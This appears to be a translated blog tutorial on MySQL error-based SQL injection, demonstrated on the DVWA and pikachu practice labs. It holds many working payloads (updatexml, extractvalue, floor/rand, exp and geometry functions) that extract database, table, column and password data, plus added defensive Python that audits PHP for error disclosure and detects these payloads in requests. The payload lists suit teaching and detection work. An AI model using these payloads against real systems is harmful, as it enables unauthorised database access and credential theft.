SQL injection: error-based injection functions explained, with illustrations
2022-07-07 21:13:00 【1024 questions】
Preface
Commonly used error-reporting functions
Usage details
updatexml() function
Example
extractvalue() function
floor() function
exp() function
12 error-based injection functions
Summary
Preface
Error-based injection depends on one precondition: when a statement fails, the error message is output to the front end. The vulnerability arises because developers use functions such as print_r(), mysql_error() and mysqli_connect_error() to output MySQL error information to the front end, so the original statement can be closed and the statement appended after it gets executed.
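To find the root cause described above in a code base, the following added example (not part of the original article) audits PHP source for statements that send MySQL error text to the client, including one level of variable propagation. It is a line-based heuristic; the function name find_error_disclosure and the PHP fragment are constructed for illustration, and mysqli_error() and the ->error property are included as the mysqli siblings of the functions the text names.

```python
import re

# Calls/properties that return MySQL error text. mysql_error() and
# mysqli_connect_error() are named above; the rest are their mysqli siblings.
ERROR_SOURCE = re.compile(
    r"\b(?:mysql_error|mysqli_error|mysqli_connect_error)\s*\("
    r"|->(?:error|connect_error)\b")
# PHP constructs that write into the HTTP response body.
OUTPUT_SINK = re.compile(r"\b(?:echo|print|printf|print_r|var_dump|die|exit)\b")
ASSIGNMENT = re.compile(r"(\$\w+)\s*(\.?=)(?!=)(.*)")

def find_error_disclosure(php_source):
    """Return [(line_no, text)] for statements that send DB error text to the client."""
    tainted, findings = set(), []
    def carries_error(text):
        return bool(ERROR_SOURCE.search(text)) or any(
            re.search(re.escape(var) + r"\b", text) for var in tainted)
    for line_no, raw in enumerate(php_source.splitlines(), start=1):
        line = raw.strip()
        if line.startswith(("//", "#", "/*", "*")):
            continue                      # skip comment lines
        assign = ASSIGNMENT.match(line)
        if assign:
            var, op, rhs = assign.groups()
            if carries_error(rhs):
                tainted.add(var)          # variable now holds error text
            elif op == "=":
                tainted.discard(var)      # overwritten with a harmless value
        if OUTPUT_SINK.search(line) and carries_error(line):
            findings.append((line_no, line))
    return findings

# Constructed PHP fragment for the demonstration (not taken from the article).
SAMPLE_PHP = """<?php
$conn = mysqli_connect($host, $user, $pass, $db);
if (!$conn) { die(mysqli_connect_error()); }
$sql = "insert into user(name) value('" . $_POST['name'] . "')";
if (!mysqli_query($conn, $sql)) {
    $err = mysqli_error($conn);
    error_log($err);
    echo "Insert failed: " . $err;
}
$err = "Registration failed";
echo $err;
"""

if __name__ == "__main__":
    for line_no, text in find_error_disclosure(SAMPLE_PHP):
        print(f"line {line_no}: {text}")
```

Writing the error to the server log with error_log() and returning a fixed message to the client is not flagged; only statements that place the error text in the response are.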
Commonly used error-reporting functions
updatexml() is MySQL's XPath function for querying and modifying XML document data
extractvalue() is MySQL's XPath function for querying XML document data
floor() is MySQL's function for rounding down to an integer
exp() returns e (the base of the natural logarithm) raised to the power X
Usage details
updatexml() function
updatexml() changes (finds and replaces) the value of the matching nodes in an XML document
Syntax: updatexml(xml_document, XPath_string, new_value)
The first parameter is a string (the name of the XML document object)
The second parameter specifies a location in the string (an XPath-format string)
The third parameter is the replacement value, in string format
The XPath expression must be valid, otherwise an error is raised. This behaviour can be used to make the error message disclose the data we want
Example
Registration adds data to the database, i.e. an insert.
Entering a single quote in the user field produces an error
Guess the back-end statement:
insert into user(name,password,sex,phone,address1,address2) value('xxx',123,1,2,3,4)
The single quote can be closed at xxx to reveal the data we want:
?id=1' or updatexml(0,concat(0x7e,(select database())),1) or '
Closing the single quote breaks out of the string, and the rebuilt query then reports the database name: "pikachu"
The analysis process
When the input payload is
?id=1' or updatexml(0,concat(0x7e,(select database())),1) or '
the back end concatenates it into
insert into user(name,password,sex,phone,address1,address2) value('' or updatexml(1,concat(0x7e,database()),0) or '',
Table names, column names and fields are queried the same way as in a normal query; only their position changes
Usage
Database name
1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#
Table names
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
Column names (assuming there is a users table and the database is dvwa)
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #
Field values (assuming the field name is last_name; dvwa.users refers to the users table in the dvwa database)
1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #
extractvalue() function
extractvalue() returns, from the target XML, the string containing the queried value
extractvalue(XML_document, XPath_string);
The first parameter, XML_document, is in string format and is the name of the XML document object (doc in this article)
The second parameter, XPath_string, is an XPath-format string. The XPath expression must be valid, otherwise an error is raised
Build the payload
?id=1' or extractvalue(0,concat(0x7e,database())) or '
Note: the XPath error echoes only one value at a time, so limit is used to read values one by one. The echoed string is at most 32 characters long; anything beyond 32 characters is not shown
Usage
Current database
1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #
Current tables
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #
Table information (assuming the table is users)
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #
Field values (the fields are user_id, first_name, last_name; dvwa.users refers to the users table in the dvwa database)
1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #
floor() function
floor() is MySQL's integer rounding function
Database name
id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #
Table names (the database is dvwa; increment the limit 0,1 value to step through the tables: limit 1,1, limit 2,1)
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#
Field names (database: dvwa, table: users)
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#
Field values (fields: user, password; dvwa.users refers to the users table in the dvwa database)
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#
exp() function
When passed a value greater than 709, exp() raises an overflow error.
Database name
id=1' or exp(~(SELECT * from(select database())a)) or '
Table names (database name: pikachu)
id=1' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or '
Field names (table name: users)
id=1' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name = 'users')a)) or '
Field values (field name: password, table name: users)
id=1' or exp(~(select * from(select password from users limit 0,1)a)) or '
12 error-based injection functions
1. Error via floor; the injection statement is as follows:
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2. Error via extractvalue; the injection statement is as follows:
and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3. Error via updatexml; the injection statement is as follows:
and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4. Error via exp; the injection statement is as follows:
and exp(~(select * from (select user()) a));
5. Error via join; the injection statement is as follows:
select * from(select * from mysql.user a join mysql.user b)c;
6. Error via NAME_CONST; the injection statement is as follows:
and exists(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c);
7. Error via GeometryCollection(); the injection statement is as follows:
and GeometryCollection((select * from(select * from(select user())a)b));
8. Error via polygon(); the injection statement is as follows:
and polygon((select * from(select * from(select user())a)b));
9. Error via multipoint(); the injection statement is as follows:
and multipoint((select * from(select * from(select user())a)b));
10. Error via multilinestring(); the injection statement is as follows:
and multilinestring((select * from(select * from(select user())a)b));
11. Error via multipolygon(); the injection statement is as follows:
and multipolygon((select * from(select * from(select user())a)b));
12. Error via linestring(); the injection statement is as follows:
and linestring((select * from(select * from(select user())a)b));
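The functions listed above give a defender a compact set of signatures to look for in request parameters. The following is an added example, not part of the original article: it URL-decodes parameter values and classifies them by which of these error-based primitives they contain. The signature names, the classify and scan helpers and the sample requests are constructed for illustration; the join statement in item 5 has no function name to match and is not covered.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the error-based primitives listed in this article.
GEOMETRY = "geometrycollection|multilinestring|multipolygon|multipoint|linestring|polygon"
SIGNATURES = {
    "xpath-error": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "floor-rand-group-by": re.compile(r"\bfloor\s*\(\s*rand\s*\(.*\bgroup\s+by\b", re.I | re.S),
    "exp-overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "geometry-error": re.compile(rf"\b(?:{GEOMETRY})\s*\(\s*\(\s*select\b", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

def normalise(value):
    """Decode URL encoding until the value is stable, then collapse whitespace."""
    previous = None
    while value != previous:
        previous, value = value, unquote_plus(value)
    return re.sub(r"\s+", " ", value)

def classify(value):
    """Return the sorted signature names matched by one request parameter value."""
    text = normalise(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(requests):
    """Map request id -> {parameter: [signatures]} for parameters with any hit."""
    report = {}
    for request_id, params in requests.items():
        hits = {k: classify(v) for k, v in params.items() if classify(v)}
        if hits:
            report[request_id] = hits
    return report

# Constructed sample requests (parameter values as they would appear in an access log).
SAMPLE_REQUESTS = {
    "r1": {"id": "1' and updatexml(1,concat(0x7e,database()),1)#"},
    "r2": {"id": "1%27%20or%20EXTRACTVALUE(0%2Cconcat(0x7e%2Cuser()))%20or%20%27"},
    "r3": {"id": "1' union select count(*),concat(floor(rand(0)*2),database()) x "
                 "from information_schema.schemata group by x #"},
    "r4": {"id": "7", "note": "Polygon (draft 2) export, updated xml attached"},
}

if __name__ == "__main__":
    for request_id, hits in scan(SAMPLE_REQUESTS).items():
        print(request_id, hits)
```

A hit indicates an injection attempt, not a successful one; whether data was disclosed depends on whether the application returned the database error text in its response.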
Summary
That concludes this article on error-based SQL injection functions.